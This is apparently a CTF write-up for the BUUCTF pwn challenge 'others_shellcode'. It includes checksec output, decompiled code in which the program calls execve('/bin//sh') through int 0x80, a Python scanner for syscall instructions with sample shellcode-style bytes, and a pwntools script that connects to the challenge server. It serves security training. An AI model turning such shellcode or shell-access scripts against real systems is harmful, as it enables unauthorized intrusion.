Approach:
Leak or modify memory data:
- Heap address: not needed
- Stack address: not needed
- libc address: not needed
- BSS segment address: not needed
Hijack program control flow:
Get a shell or the flag: [[use int 0x80 OR syscall (syscall number)]]
Lessons learned:
Challenge information:
┌──(kali㉿kali)-[~/Desktop]
└─$ file others_shellcode
others_shellcode: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c1e8d8e26946c6b08794abdad991e3909e1bdc7f, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=others_shellcode
RELRO           STACK CANARY      NX           PIE           RPATH      RUNPATH      Symbols       FORTIFY   Fortified   Fortifiable   FILE
Partial RELRO   No canary found   NX enabled   PIE enabled   No RPATH   No RUNPATH   72) Symbols   No        0           0             others_shellcode
libc version:
Writeup referenced: [BUUCTF-pwn]——others_shellcode, Y-peak's blog on CSDN
Core pseudocode analysis:
Exploitable code:
int getShell()
{
int result; // eax
char v1[9]; // [esp-Ch] [ebp-Ch] BYREF
strcpy(v1, "/bin//sh");
result = 11;
__asm { int 80h; LINUX - sys_execve }
return result;
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
getShell();
return 0;
}
Analysis:
main() calls getShell() directly: it copies "/bin//sh" onto the stack, loads eax with 11 (the i386 execve syscall number) and issues int 0x80. Nothing has to be exploited; just connect with nc and you get a shell.
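To make the "int 0x80 OR syscall (syscall number)" point concrete, here is an added example (my own code, not from the writeup or the challenge): a small scanner that finds direct syscall instructions in raw code bytes and reports which number was loaded into eax beforehand, covering both the i386 int 0x80 form used by getShell() and the x86-64 syscall form. The byte fragments in SAMPLES are constructed for the demo, and the eax tracking is a heuristic over a few common opcodes, not a real disassembler.

```python
# Added example, not part of the original writeup: a small static scanner that
# finds direct system-call instructions in raw i386 / x86-64 code bytes and
# reports the syscall number loaded into eax just before each one.

I386_SYSCALLS = {1: "exit", 3: "read", 4: "write", 11: "execve"}   # int 0x80 numbers
X64_SYSCALLS = {0: "read", 1: "write", 59: "execve", 60: "exit"}   # syscall numbers

def _track_eax(code, end):
    """Last constant loaded into eax before offset `end`, or None if unknown.
    Recognises mov eax, imm32 (B8), mov al, imm8 (B0) and xor eax, eax (31 C0)."""
    eax = None
    i = 0
    while i < end:
        if code[i] == 0xB8 and i + 5 <= end:            # mov eax, imm32
            eax = int.from_bytes(code[i + 1:i + 5], "little")
            i += 5
        elif code[i] == 0xB0 and i + 2 <= end:          # mov al, imm8 (upper bytes kept)
            # assumption: upper bytes are 0 if eax was never set explicitly
            eax = ((eax or 0) & 0xFFFFFF00) | code[i + 1]
            i += 2
        elif code[i:i + 2] == b"\x31\xc0":              # xor eax, eax
            eax = 0
            i += 2
        else:
            i += 1                                      # unrecognised byte, skip it
    return eax

def find_syscalls(code):
    """Return [(offset, mnemonic, eax, name)] for every int 0x80 / syscall in `code`."""
    found = []
    for i in range(len(code) - 1):
        pair = code[i:i + 2]
        if pair == b"\xcd\x80":
            table, mnem = I386_SYSCALLS, "int 0x80"
        elif pair == b"\x0f\x05":
            table, mnem = X64_SYSCALLS, "syscall"
        else:
            continue
        eax = _track_eax(code, i)
        found.append((i, mnem, eax, table.get(eax, "unknown")))
    return found

# Constructed sample fragments (not bytes taken from the challenge binary):
SAMPLES = {
    "getShell_like":   b"\xb8\x0b\x00\x00\x00\xcd\x80",   # mov eax, 11 ; int 0x80
    "shellcode_style": b"\x31\xc0\xb0\x0b\xcd\x80",       # xor eax, eax ; mov al, 11 ; int 0x80
    "x86_64":          b"\x48\x31\xc0\xb0\x3b\x0f\x05",   # xor rax, rax ; mov al, 59 ; syscall
    "no_eax_load":     b"\x90\xcd\x80",                   # nop ; int 0x80 (number unknown)
}
```

Running find_syscalls over each SAMPLES entry reports the getShell-style fragment as execve (11) via int 0x80 and the x86-64 fragment as execve (59) via syscall; a fragment with no recognised eax load is reported as unknown rather than guessed.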
Script:
from pwn import *
context(log_level='debug', arch='i386', os='linux')
pwnfile = './others_shellcode'
sh = remote('node4.buuoj.cn', 29881)   # remote challenge instance
# sh = process(pwnfile)                # use this line instead for a local run
sh.interactive()                       # the program spawns /bin//sh itself